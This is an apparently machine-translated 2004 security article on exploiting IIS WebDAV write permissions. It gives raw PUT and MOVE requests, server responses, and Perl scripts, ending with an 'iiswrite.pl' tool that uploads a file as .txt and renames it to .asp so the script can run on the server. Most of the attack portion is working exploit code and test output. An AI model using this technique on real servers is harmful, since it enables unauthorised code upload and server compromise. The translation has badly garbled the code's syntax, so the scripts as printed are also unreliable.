Exploitation of IIS write permissions

Author: superhei Nature of the article: original Released on: 2004-07-21

You may have read the remote analysis of IIS settings, which analyzes various IIS settings. Here I will analyze the IIS write permissions, the following describes how to analyze IIS write permissions by referencing the remote analysis IIS settings article: Write Permission To test whether a directory has write permissions for a Web user, telnet to the Web port (80) of the server and send the following request: Put/DIR/my_file.txt HTTP/1.1 HOST: IIS-Server Content-Length: 10 At this time, the server will return a 100 (CONTINUE) message: HTTP/1.1 100 continue Server: Microsoft-Microsoft IIS/5.0 Date: Thu, 28 Feb 2002 15:56:00 GMT Then, we enter 10 letters: Aaaaaaaaaa After sending this request, check the server's returned information. If the request is a 201 created response: HTTP/1.1 201 created Server: Microsoft-Microsoft IIS/5.0 Date: Thu, 28 Feb 2002 15:56:08 GMT Location: http: // IIS-server/DIR/my_file.txt Content-Length: 0 Allow: Options, Trace, get, Head, delete, put, copy, move, PROPFIND, Proppatch, search, lock, unlock This indicates that the write permission for this directory is open. Otherwise, if a 403 error is returned, the write permission is not enabled. If you need to authenticate, if a 401 (Forbidden) response is returned, the write permission is enabled, but anonymous users are not allowed. If "write" and "script and executable program" are enabled in a directory, web users can upload a program and execute it !~ Here is a brief description: Put/DIR/my_file.txt HTTP/1.1 HOST: IIS-Server Content-Length: 10 　　Put:The request server stores the attachment entity in the provided request URL. If the requested URL points to a resource that already exists, the attachment entity should be viewed as a modified version of the resource on the current original server. If the requested URL does not point to an existing resource, the requested URL is defined by the user agent as a new resource, and the origin server generates this resource using this URL. 　　Host:Is the sending Address of the HTTP request 　　Content-Length:Is the content length, that is, the object length. The length value is consistent with the size of the uploaded file. It is very cumbersome to submit via NC (Telnet). Here we write a simple Perl program to complete this complicated submission process. When writing code, we use binmode () to open the file, the Code is as follows: #! /Usr/bin/perl Use IO: socket; $ Argc = @ argv; If ($ argc! = 4) { Print "Usage: $0 127.0.0.1 80 kaka.exe/scripts/file.exe/N "; Exit; } $ Host = @ argv [0]; $ Port = @ argv [1]; $ File = @ argv [2]; $ Path = @ argv [3]; @ S = Stat ("$ file "); $ Size = $ s [7]; # Get the file size Print "$ file size is $ size Bytes/N "; My $ sock = IO: Socket: iNet-> New (PROTO => "TCP ", Peeraddr => $ host, Peerport => $ port) | die "Sorry! Cocould not connect to $ host/N "; Print $ sock "put $ path http/1.1/N "; Print $ sock "Host: $ host/N "; Print $ sock "Content-Length: $ size/n"; # sock connection Open (file, "$ file "); Binmode (File); # open the file in binary format While (read (file, $ char, 1024) {# Read File data upload Print $ sock "$ char "; } Print $ sock "/n "; @ Req = <$ sock>; Print "Please wait.../N "; Sleep (2 ); If ($ req [4] = ~ /200 | 201 /){ Print "upfile succeed !!! "; # Displayed successfully } Else { Print "upfile faile !!! /N "; Print @ req; # An error is returned if it fails. } Close $ sock; Close file; The following is a test: C:/usr/bin> perl.exe iiswt. pl 127.0.0.1 80 kaka.txt/scripts/kaka.txt Kaka.txt size is 14 bytes Please wait... Upfile succeed !!! C:/inetpub/scripts> dir kaka.txt The volume in drive C is not labeled. The serial number of the volume is 3cd1-479e C:/inetpub/scripts directory 14 kaka.txt 1 file, 14 bytes 0 directories, 3,871,080,448 available bytes Now we have successfully uploaded kaka.txt to the web directory scripts, thinking that the program uses the binmode () method (Binary) to open the file, you should be able to upload other files, we first test the EXE file: C:/usr/bin> perl.exe iiswt. pl 127.0.0.1 80 perl.exe/scripts/perl.exe Perl.exe size is 20535 bytes Please wait... Upfile succeed !!! C:/inetpub/scripts> dir perl.exe The volume in drive C is not labeled. The serial number of the volume is 3cd1-479e C:/inetpub/scripts directory 20,535 perl.exe 1 file, 20,535 bytes 0 directories, 3,871,031,296 available bytes If yes, you can upload the EXE file. Can you upload any file? Next we will test the ASP file: C:/usr/bin> perl.exe iiswt. pl 127.0.0.1 80 Kaka. asp/scripts/Kaka. asp Kaka. asp size is 4 bytes Please wait... Upfile faile !!! HTTP/1.1 100 continue Server: Microsoft-Microsoft IIS/5.0 Date: Tue, 04 May 2004 16:45:51 GMT HTTP/1.1 403 Forbidden Server: Microsoft-Microsoft IIS/5.0 Date: Tue, 04 May 2004 16:45:51 GMT Connection: Close Content-Type: text/html Content-Length: 44 <Body> <H2> HTTP/1.1 403 Forbidden </H2> </body> Failed !! The error "HTTP/1.1 403 Forbidden" is prompted. It seems that ASP cannot be written directly in post mode. After testing, as long as the file type is supported by IIS, an HTTP/1.1 forbidden error is generated. How can we upload files of the file type supported by IIS? In addition to put, post, and get operations, IIS can also execute commands such as copy and move! We can first upload the local ASP file to other files such as TXT in the web directory of the remote host. We have mentioned the copy and move command to change it to ASP. We should submit the test using NC: D:/> NC 127.0.0.1 80 Move/scripts/kaka.txt HTTP/1.1 HOST: 127.0.0.1 Destination: http: // 127.0.0.1/scripts/Kaka. asp HTTP/1.1 201 created Server: Microsoft-Microsoft IIS/5.0 Date: Sun, 05 Oct 2003 09:30:59 GMT Location: http: // 127.0.0.1/scripts/X. asp Content-Type: text/XML Content-Length: 0 You can use move to rename/scripts/kaka.txt/scripts/Kaka. asp. In this way, we can combine put and move to complete easy file writing through IIS :). We still use Perl. ASP write test succeeded: C:/usr/bin> Perl Kaka. pl 127.0.0.1 80 Kaka. asp/scripts/Kaka. asp **************************************** ******************** Codz by using superhei <QQ: 123230273> & Lanker <QQ: 18779569> **************************************** ******************** Kaka. asp size is 4 bytes Please wait... Upfile succeed !!! Modifyfile succeed !!! The final iiswrite. pl code is as follows (because when I write this article, I first draft the code in the article in the Internet cafe, and then test and finally complete the Lanker, THX Lanker .) : #! /Usr/bin/perl # The iiswrite script Use IO: socket; $ Argc = @ argv; Print "*" x 60; Print "/ncodz by using superhei <QQ: 123230273> & Lanker <QQ: 18779569>/N "; Print "*" x 60, "/N "; If ($ argc! = 4) { Print "Usage: $0 127.0.0.1 80 kaka.txt/scripts/my_file.txt/N "; Exit; } $ Host = @ argv [0]; $ Port = @ argv [1]; $ Path = @ argv [3]; $ File = @ argv [2]; @ Path = Split ("/", $ PATH ); $ Any = POP (@ path ); $ Path1 = join ("/", @ path ); @ S = Stat ("$ file "); $ Size = $ s [7]; Print "$ file size is $ size Bytes/N "; My $ sock = IO: Socket: iNet-> New (PROTO => "TCP ", Peeraddr => $ host, Peerport => $ port) | die "Sorry! Cocould not connect to $ host/N "; Print $ sock "put $ path1/lanker.txt HTTP/1.1/N "; Print $ sock "Host: $ host/N "; Print $ sock "Content-Length: $ size/n "; Open (file, "$ file") | die "can't open $ file "; Binmode (File ); While (read (file, $ char, 1024 )){ Print $ sock "$ char "; } Print $ sock "/n "; @ Req = <$ sock>; Print "Please wait.../N "; Sleep (2 ); If ($ req [4] = ~ /200 | 201 /){ Print "upfile succeed !!! /N "; } Else { Print "upfile faile !!! /N "; } Close $ sock; Close file; My $ sock = IO: Socket: iNet-> New (PROTO => "TCP ", Peeraddr => $ host, Peerport => $ port) | die "Sorry! Cocould not connect to $ host/N "; Print $ sock "move $ path1/lanker.txt HTTP/1.1/N "; Print $ sock "Host: $ host/N "; Print $ sock "Destination: http: // $ HOST: $ port $ path/n "; @ Req = <$ sock>; If ($ req [0] = ~ /20/d + | /){ Print "modifyfile succeed !!! "; } Else { Print "upfile faile !!! "; } Close $ sock;